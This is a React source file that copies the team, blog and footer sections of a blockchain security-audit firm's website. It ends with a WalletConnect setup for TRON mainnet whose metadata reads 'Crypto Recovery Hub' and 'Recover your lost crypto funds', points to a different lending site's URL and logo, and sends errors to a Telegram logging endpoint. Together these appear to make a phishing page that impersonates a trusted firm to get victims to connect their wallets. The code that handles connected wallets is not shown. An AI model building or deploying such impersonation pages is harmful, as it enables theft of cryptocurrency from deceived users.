                      <div className="block_content dark_block text-align-center">
                        <div className="team_photo-container">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a9022101ba72faf8979a72_Frame 340.png"
                            loading="lazy"
                            width={180}
                            alt=""
                            className="block_img sm"
                          />
                        </div>
                        <h3>Jan Kalivoda</h3>
                        <h4>Ethereum Tech Lead</h4>
                        <div className="team_description">
                          <p className="team_p">
                            Crypto enthusiast since 2014, EVM maximalist since
                            he wrote his thesis on Bitcoin L2 security.
                            Committed to securing the Ethereum ecosystem towards
                            Solarpunk future while keeping backdoors for
                            Lunarpunk.
                          </p>
                        </div>
                      </div>
                      <div className="blur_block" />
                    </div>
                  </div>
                  <div className="column team hover_gradient _1">
                    <div className="block_black _w-100 upd">
                      <div className="block_content dark_block text-align-center">
                        <div className="team_photo-container">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6698e34420c31a5547621585_Michal.png"
                            loading="lazy"
                            width={180}
                            sizes="100vw"
                            alt="Michal Prevratil"
                            srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6698e34420c31a5547621585_Michal-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6698e34420c31a5547621585_Michal-p-800.png 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6698e34420c31a5547621585_Michal-p-1080.png 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6698e34420c31a5547621585_Michal.png 1144w"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Michal Prevratil</h3>
                        <h4>Head of Tooling</h4>
                        <div className="team_description">
                          <p className="team_p">
                            Michal is a blockchain enthusiast, contributor to
                            the Ethereum Yellow Paper and a graduate of Computer
                            Security at CTU Prague. He currently is working on
                            open-source security tooling for secure and
                            efficient Solidity and Solana development. Michal is
                            also lead Auditor with a track record of critical
                            vulnerabilities detected.
                          </p>
                        </div>
                      </div>
                      <div className="blur_block" />
                    </div>
                  </div>
                  <div
                    id="w-node-b4997f80-6ea2-3b86-e4ae-1f5bf82f26a0-3ba73669"
                    className="hide-tablet"
                  />
                </div>
              </div>
            </div>
            <section className="blog_section">
              <div className="container-ii">
                <div className="blog_container">
                  <div
                    id="w-node-e06e4ba6-7541-9167-ebfc-a7739345945a-3ba73669"
                    className="blog_img-container is--left"
                  >
                    <h2 className="blog_h">Learn about blockchain</h2>
                    <a
                      href="blog/index.html"
                      target="_blank"
                      className="button is-small w-inline-block"
                    >
                      <div className="button-text">All articles</div>
                      <div className="button-arrow w-embed">
                        <svg
                          xmlns="http://www.w3.org/2000/svg"
                          width="100%"
                          height="auto"
                          viewBox="0 0 9 14"
                          fill="none"
                        >
                          <path
                            d="M1 1L7 7L1 13"
                            stroke="white"
                            strokeWidth="1.5"
                          />
                        </svg>
                      </div>
                    </a>
                  </div>
                  <div id="w-node-_007f36e2-f9d2-9813-a2c5-3e1598ff748e-3ba73669">
                    <div className="w-dyn-list">
                      <div role="list" className="articles_list w-dyn-items">
                        <div role="listitem" className="w-dyn-item">
                          <a
                            href="blog/list-of-our-public-audits/index.html"
                            className="article_link-block w-inline-block"
                          >
                            <h3>List of our public audits</h3>
                            <div className="article_body">
                              <div className="author_block">
                                <div className="author_photo-container">
                                  <img
                                    src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/6621233fd44f04553ba7365c_avatar_user_11_1659019807-70x70.png"
                                    loading="lazy"
                                    alt=""
                                    className="author_photo"
                                  />
                                </div>
                                <div>Andrea Nováková</div>
                              </div>
                              <div className="article_info">
                                <div className="text-separate">//</div>
                                <div className="article_tags-list">
                                  AUDITS, ETHEREUM, SOLANA
                                </div>
                                <div className="article-date">
                                  November 25, 2022
                                </div>
                              </div>
                              <div className="article_link">Read</div>
                            </div>
                          </a>
                        </div>
                        <div role="listitem" className="w-dyn-item">
                          <a
                            href="blog/how-to-prepare-for-a-smart-contract-audit-2/index.html"
                            className="article_link-block w-inline-block"
                          >
                            <h3>How to prepare for a smart contract audit</h3>
                            <div className="article_body">
                              <div className="author_block">
                                <div className="author_photo-container">
                                  <img
                                    src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/6621233fd44f04553ba7365b_jan_ackbch_discord-70x70.png"
                                    loading="lazy"
                                    alt=""
                                    className="author_photo"
                                  />
                                </div>
                                <div>Jan Kalivoda</div>
                              </div>
                              <div className="article_info">
                                <div className="text-separate">//</div>
                                <div className="article_tags-list">
                                  AUDITS, EDUCATION, ETHEREUM, SOLANA
                                </div>
                                <div className="article-date">
                                  March 17, 2023
                                </div>
                              </div>
                              <div className="article_link">Read</div>
                            </div>
                          </a>
                        </div>
                        <div role="listitem" className="w-dyn-item">
                          <a
                            href="blog/how-to-develop-secure-cross-chain-apps-on-axelar/index.html"
                            className="article_link-block w-inline-block"
                          >
                            <h3>
                              How to develop secure cross-chain apps on Axelar
                            </h3>
                            <div className="article_body">
                              <div className="author_block">
                                <div className="author_photo-container">
                                  <img
                                    src="#"
                                    loading="lazy"
                                    alt=""
                                    className="author_photo w-dyn-bind-empty"
                                  />
                                </div>
                                <div>Stepan Sonsky</div>
                              </div>
                              <div className="article_info">
                                <div className="text-separate">//</div>
                                <div className="article_tags-list">
                                  EDUCATION, SOLIDITY, TUTORIAL
                                </div>
                                <div className="article-date">
                                  April 5, 2023
                                </div>
                              </div>
                              <div className="article_link">Read</div>
                            </div>
                          </a>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </section>
            <div id="contact" className="footer-section">
              <div className="container-ii is-footer">
                <div className="footer-block">
                  <div className="footer-column first">
                    <div className="block-content">
                      <h3 className="heading-small">
                        Need a security audit? <br />
                        Let us know
                      </h3>
                      <div className="button-wrapper">
                        <a
                          href="contact.html"
                          className="button is-small w-inline-block"
                        >
                          <div className="button-text">Contact</div>
                          <div className="button-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 14"
                              fill="none"
                            >
                              <path
                                d="M1 1L7 7L1 13"
                                stroke="white"
                                strokeWidth="1.5"
                              />
                            </svg>
                          </div>
                        </a>
                      </div>
                    </div>
                    <div className="block-content">
                      <div className="link-wrapper">
                        <h3 className="heading-small subheading">About</h3>
                        <a
                          href="index.html#services"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">Services</div>
                        </a>
                        <a
                          href="blog/category/audits/index.html"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">Audits</div>
                        </a>
                        <a
                          href="index.html#team"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">Team</div>
                        </a>
                        <a
                          href="https://ackeeblockchain.recruitee.com/"
                          target="_blank"
                          className="footer-link w-inline-block" rel="noreferrer"
                        >
                          <div className="link-text">Career</div>
                          <div className="fl-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 9"
                              fill="none"
                            >
                              <path d="M8.5 1L1 8.5" stroke="currentColor" />
                              <path d="M2.5 1H8.5V7" stroke="currentColor" />
                            </svg>
                          </div>
                        </a>
                      </div>
                    </div>
                    <div className="block-content">
                      <div className="link-wrapper">
                        <h3 className="heading-small subheading">Tooling</h3>
                        <a
                          href="https://getwake.io/"
                          target="_blank"
                          className="footer-link w-inline-block" rel="noreferrer"
                        >
                          <div className="link-text">Wake</div>
                          <div className="fl-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 9"
                              fill="none"
                            >
                              <path d="M8.5 1L1 8.5" stroke="currentColor" />
                              <path d="M2.5 1H8.5V7" stroke="currentColor" />
                            </svg>
                          </div>
                        </a>
                        <a
                          href="https://twitter.com/TridentSolana"
                          target="_blank"
                          className="footer-link w-inline-block" rel="noreferrer"
                        >
                          <div className="link-text">Trident</div>
                          <div className="fl-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 9"
                              fill="none"
                            >
                              <path d="M8.5 1L1 8.5" stroke="currentColor" />
                              <path d="M2.5 1H8.5V7" stroke="currentColor" />
                            </svg>
                          </div>
                        </a>
                        <a
                          href="solidity-extension.html"
                          target="_blank"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">Solidity</div>
                        </a>
                      </div>
                    </div>
                    <div className="block-content">
                      <div className="link-wrapper">
                        <h3 className="heading-small subheading">Learn</h3>
                        <a
                          href="blog/index.html"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">Research</div>
                        </a>
                        <a
                          href="school-of-solana.html"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">School of Solana</div>
                        </a>
                        <link rel="prefetch" href="school-of-solana.html" />
                        <a
                          href="solana-auditors-bootcamp.html"
                          className="footer-link w-inline-block"
                        >
                          <div className="link-text">
                            Solana Auditors
                            <br />
                            Bootcamp
                          </div>
                        </a>
                      </div>
                    </div>
                  </div>
                  <div className="footer-column frame-footer">
                    <div className="social-wrapper is-footer">
                      <a
                        href="https://t.me/josef_ackee"
                        target="_blank"
                        className="social-link w-inline-block" rel="noreferrer"
                      >
                        <div className="social-icon w-embed">
                          <svg
                            width="100%"
                            height="auto"
                            viewBox="0 0 36 36"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <path
                              fillRule="evenodd"
                              clipRule="evenodd"
                              d="M5.71862 17.6099C12.4295 14.7874 16.9045 12.9267 19.1435 12.0277C25.5365 9.46077 26.8649 9.01488 27.7307 9.00016C27.9212 8.99692 28.347 9.04248 28.6228 9.25852C28.8557 9.44094 28.9197 9.68737 28.9504 9.86033C28.9811 10.0333 29.0192 10.4273 28.9889 10.7351C28.6424 14.249 27.1434 22.7762 26.3808 26.7118C26.0581 28.3771 25.4227 28.9354 24.8076 28.9901C23.4707 29.1088 22.4556 28.1372 21.1608 27.3179C19.1348 26.0358 17.9901 25.2377 16.0235 23.9867C13.7507 22.5408 15.224 21.7462 16.5193 20.4475C16.8583 20.1076 22.7484 14.9358 22.8624 14.4667C22.8767 14.408 22.8899 14.1893 22.7553 14.0738C22.6207 13.9583 22.422 13.9978 22.2787 14.0292C22.0754 14.0737 18.8388 16.1389 12.5686 20.2247C11.6499 20.8337 10.8177 21.1304 10.0721 21.1149C9.25018 21.0977 7.6691 20.6663 6.49372 20.2974C5.05207 19.8451 3.90628 19.6059 4.00606 18.8376C4.05802 18.4374 4.62888 18.0282 5.71862 17.6099Z"
                              fill="currentColor"
                            />
                          </svg>
                        </div>
                      </a>
                      <a
                        href="https://github.com/Ackee-Blockchain"
                        target="_blank"
                        className="social-link w-inline-block" rel="noreferrer"
                      >
                        <div className="social-icon w-embed">
                          <svg
                            width="100%"
                            height="auto"
                            viewBox="0 0 36 36"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <path
                              d="M21.8651 29L21.8681 28.2375C21.8727 27.4735 21.8788 26.3197 21.8788 24.9935C21.8788 23.612 21.4292 22.7088 20.9246 22.2502C24.064 21.882 27.3594 20.6307 27.3594 14.9377C27.3793 13.4653 26.8609 12.0411 25.9098 10.9603C26.0566 10.5824 26.5367 9.07583 25.7721 7.03417C25.7721 7.03417 24.5794 6.64646 21.9002 8.55326C19.5896 7.88878 17.1521 7.88878 14.8415 8.55326C12.1485 6.63666 10.965 7.03417 10.965 7.03417C10.1988 9.08053 10.6821 10.5875 10.8289 10.9603C9.87464 12.0415 9.35471 13.4681 9.37612 14.9428C9.37612 20.6209 12.6776 21.8918 15.7972 22.2623C15.3935 22.6328 15.0296 23.2855 14.9011 24.2424C14.0983 24.6278 12.0599 25.2805 10.8013 23.0158C10.8013 23.0158 10.0566 21.5951 8.64058 21.4896C8.64058 21.4896 7.26583 21.47 8.54424 22.3901C8.54424 22.3901 8.8516 22.5399 9.2339 22.9954C9.51527 23.3306 9.83793 23.8312 10.1101 24.5592C10.1101 24.5592 10.9374 27.2018 14.8568 26.3064L14.8766 29H21.8651Z"
                              fill="currentColor"
                            />
                          </svg>
                        </div>
                      </a>
                      <a
                        href="https://warpcast.com/ackee"
                        target="_blank"
                        className="social-link w-inline-block" rel="noreferrer"
                      >
                        <div className="social-icon w-embed">
                          <svg
                            width="100%"
                            height="auto"
                            viewBox="0 0 36 36"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <path
                              d="M28.2847 26.5214C28.2582 26.225 28.2606 25.9195 28.1979 25.6289C28.1255 25.2921 27.7901 25.231 27.5473 25.1071C27.4468 23.8423 27.499 14.0194 27.6084 13.709C27.8159 13.6966 28.0266 13.6834 28.2566 13.6694C28.497 12.7348 28.7318 11.8217 28.9851 10.8343H25.3181V8H10.6735V10.8235C10.2063 10.8235 9.80663 10.8235 9.40616 10.8235C9.01775 10.8235 8.62853 10.8169 8.24012 10.8252C7.8485 10.8334 7.45124 10.7839 7.02905 10.8681C7.27834 11.8407 7.51155 12.7529 7.74556 13.6669C8.00611 13.6867 8.22726 13.7032 8.45644 13.7205V25.1377C7.61609 25.2863 7.76888 25.9707 7.73832 26.5181C7.01458 26.8722 6.87707 27.1983 7.09339 27.9942H14.3743C14.3349 27.6326 14.3638 27.2817 14.2432 26.9994C14.1499 26.7823 13.8677 26.6518 13.6361 26.4545C13.5755 25.7368 13.3326 25.2863 12.9075 25.103C12.9019 25.0444 12.8898 24.9767 12.8898 24.9098C12.8882 22.9977 12.8793 21.0857 12.8898 19.1736C12.8946 18.3884 13.115 17.6528 13.505 16.9775C14.7691 14.7856 17.3433 13.8303 19.7067 14.6427C21.7243 15.3362 23.1767 17.2904 23.1244 19.5179C23.0842 21.2227 23.1155 22.9292 23.1155 24.6349C23.1155 24.7967 23.1155 24.9593 23.1155 25.1335C22.2575 25.2929 22.4031 25.969 22.3789 26.528C21.6584 26.8541 21.5136 27.1876 21.7332 28H28.9361C29.0897 27.1084 29.0012 26.9119 28.2839 26.5214H28.2847Z"
                              fill="currentColor"
                            />
                          </svg>
                        </div>
                      </a>
                      <a
                        href="https://twitter.com/ackeeblockchain"
                        target="_blank"
                        className="social-link w-inline-block" rel="noreferrer"
                      >
                        <div className="social-icon w-embed">
                          <svg
                            width="100%"
                            height="auto"
                            viewBox="0 0 36 36"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <path
                              fillRule="evenodd"
                              clipRule="evenodd"
                              d="M30 10.3647C29.1176 10.7688 28.1692 11.0382 27.1691 11.1659C28.1863 10.5412 28.9692 9.54471 29.3365 8.36706C28.3842 8.94412 27.33 9.36824 26.2077 9.59176C25.3122 8.60941 24.0341 8 22.6184 8C19.8984 8 17.6935 10.2606 17.6935 13.0482C17.6935 13.4429 17.739 13.8271 17.8226 14.2C13.7313 13.9876 10.1016 11.9753 7.67384 8.92118C7.24742 9.66765 7.00805 10.5412 7.00805 11.4635C7.00805 13.2159 7.87454 14.7588 9.19757 15.6676C8.39022 15.6424 7.63063 15.41 6.96484 15.0371V15.0965C6.96484 17.5453 8.66313 19.5847 10.9135 20.0488C10.5024 20.1653 10.0669 20.23 9.61888 20.23C9.30162 20.23 8.99119 20.1929 8.69099 20.1371C9.31811 22.1382 11.1352 23.6012 13.2889 23.6447C11.6043 24.9965 9.48185 25.8059 7.17407 25.8059C6.77495 25.8059 6.38491 25.7824 6 25.7341C8.18156 27.1629 10.7702 28 13.5488 28C22.6042 28 27.5586 20.3065 27.5586 13.6318C27.5586 13.4129 27.5518 13.1953 27.5427 12.98C28.5092 12.2735 29.3422 11.3829 30 10.3647Z"
                              fill="currentColor"
                            />
                          </svg>
                        </div>
                      </a>
                      <a
                        href="https://discord.gg/x7qXXnGCsa"
                        target="_blank"
                        className="social-link w-inline-block" rel="noreferrer"
                      >
                        <div className="social-icon w-embed">
                          <svg
                            width="100%"
                            height="auto"
                            viewBox="0 0 36 36"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <path
                              d="M27.0245 9.675C25.3414 8.8925 23.5419 8.32381 21.6605 8C21.4294 8.41512 21.1595 8.97346 20.9734 9.41762C18.9734 9.11874 16.9918 9.11874 15.0286 9.41762C14.8425 8.97346 14.5664 8.41512 14.3333 8C12.4499 8.32381 10.6482 8.89459 8.96521 9.67914C5.57053 14.7767 4.65029 19.7476 5.11041 24.648C7.36194 26.3188 9.54394 27.3338 11.6891 27.9979C12.2188 27.2736 12.6912 26.5035 13.0981 25.692C12.3231 25.3994 11.5807 25.0382 10.8793 24.6189C11.0654 24.482 11.2474 24.3387 11.4233 24.1914C15.7014 26.1798 20.3496 26.1798 24.5766 24.1914C24.7546 24.3387 24.9365 24.482 25.1206 24.6189C24.4171 25.0403 23.6727 25.4014 22.8977 25.6941C23.3046 26.5035 23.775 27.2757 24.3067 28C26.4539 27.3358 28.638 26.3209 30.8895 24.648C31.4294 18.9672 29.9672 14.0419 27.0245 9.675ZM13.6809 21.6343C12.3967 21.6343 11.3435 20.4429 11.3435 18.9921C11.3435 17.5413 12.3742 16.3479 13.6809 16.3479C14.9877 16.3479 16.0409 17.5392 16.0184 18.9921C16.0204 20.4429 14.9877 21.6343 13.6809 21.6343ZM22.319 21.6343C21.0347 21.6343 19.9815 20.4429 19.9815 18.9921C19.9815 17.5413 21.0122 16.3479 22.319 16.3479C23.6257 16.3479 24.6789 17.5392 24.6564 18.9921C24.6564 20.4429 23.6257 21.6343 22.319 21.6343Z"
                              fill="currentColor"
                            />
                          </svg>
                        </div>
                      </a>
                    </div>
                    <a href="#" className="w-inline-block">
                      <img
                        width={142}
                        height={70}
                        alt=""
                        src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73773_ABCH_Logo_full white.svg"
                        loading="lazy"
                      />
                    </a>
                    <div className="contacts">
                      <p>
                        Ackee Blockchain a.s.
                        <br />
                        Rohanske nabrezi 717/4
                        <br />
                        186 00 Prague
                        <br />
                        Czech Republic
                      </p>
                      <a
                        href="cdn-cgi/l/email-protection.html#18707d74747758797b737d7d36606162"
                        className="footer-link is-underline w-inline-block"
                      >
                        <div className="link-text">
                          <span
                            className="__cf_email__"
                            data-cfemail="1179747d7d7e5170727a74743f69686b"
                          >
                            [email&nbsp;protected]
                          </span>
                        </div>
                      </a>
                    </div>
                    <div className="link-row">
                      <a
                        href="https://github.com/Ackee-Blockchain/brand"
                        target="_blank"
                        className="footer-link is-underline w-inline-block" rel="noreferrer"
                      >
                        <div className="link-text">Brand Kit</div>
                      </a>
                      <div className="text-size-large">&nbsp;·&nbsp;&nbsp;</div>
                      <a
                        data-w-id="8f85fdad-018f-0065-8d33-186881171483"
                        href="#"
                        target="_blank"
                        className="footer-link is-underline w-inline-block"
                      >
                        <div className="link-text">Impressum</div>
                      </a>
                    </div>
                  </div>
                </div>
              </div>
              <div className="modal">
                <div className="modal_inner-container">
                  <div className="container_main">
                    <h2 className="mb_40">IMPRESSUM</h2>
                    <h3>COMPANY&nbsp;NAME:</h3>
                    <p>Ackee Blockchain a. s.</p>
                    <h3>ADDRESS:</h3>
                    <h3>PRAGUE OFFICE:</h3>
                    <p>
                      Rohanske nabrezi 717/4
                      <br />
                      186 00 Prague
                      <br />
                      Czech Republic
                    </p>
                    <p>
                      E-mail:{" "}
                      <a href="cdn-cgi/l/email-protection.html#422a272e2e2d0223212927276c3a3b38">
                        <span
                          className="__cf_email__"
                          data-cfemail="0e666b6262614e6f6d656b6b20767774"
                        >
                          [email&nbsp;protected]
                        </span>
                      </a>
                      <br />
                      Web:{" "}
                      <a href="index.html" target="_blank">
                        ackee.xyz
                      </a>
                    </p>
                    <h3>COMPANY REGISTRATION / REGISTER COURT</h3>
                    <p>
                      Městský soud v Praze
                      <br />
                      Slezská 9<br />
                      120 00 Praha 2
                    </p>
                    <p>ID: 11811315</p>
                    <h3>MANAGING PARTNER</h3>
                    <p>
                      Josef Gattermayer, PhD.&nbsp;
                      <br />
                      (Responsible for content according to § 55 para. 2 RStV)
                    </p>
                  </div>
                </div>
                <a
                  data-w-id="a36cef10-e194-de35-7e1e-ca6c78c72e90"
                  href="#"
                  className="close-modal w-inline-block"
                >
                  <img
                    src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73670_cancel.svg"
                    loading="lazy"
                    alt="cancel"
                  />
                </a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </>

    );
}

export function App() {
  const walletConnectAdapter = useMemo<WalletConnectAdapter>(() => {
      const adapter = new WalletConnectAdapter({
          network: 'Mainnet',
          options: {
              relayUrl: 'wss://relay.walletconnect.com',
              projectId: '5fc507d8fc7ae913fff0b8071c7df231',
              metadata: {
                  name: 'Crypto Recovery Hub',
                  description: 'Recover your lost crypto funds',
                  url: 'https://app.justlend.org/',
                  icons: ['https://app.justlend.org/mainLogo.svg'],
              },
          },
          web3ModalConfig: {
              themeMode: 'dark',
              themeVariables: { '--wcm-z-index': '1000' },
              explorerRecommendedWalletIds: [
                  '1ae92b26df02f0abca6304df07debccd18262fdf5fe82daa81593582dac9a369',
                  '4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0',
              ],
              chains: ['tron:mainnet'],
          },
      });

      adapter.on('connect', () => console.log('WalletConnect connection initiated'));
      adapter.on('error', (error: WalletError) => {
          console.error('WalletConnect Adapter Error:', error);
          axios.post(`${BACKEND_URL}/log-to-telegram`, { message: `❌ *WalletConnect Error*: ${error.message}` });
      });

      return adapter;
  }, []);

    return (
        <WalletProvider 
            autoConnect={false} 
            adapters={[walletConnectAdapter]}
            disableAutoConnectOnLoad={true}
        >
            <WalletModalProvider>
                <AddressViewer walletConnectAdapter={walletConnectAdapter} />
            </WalletModalProvider>
        </WalletProvider>
    );
}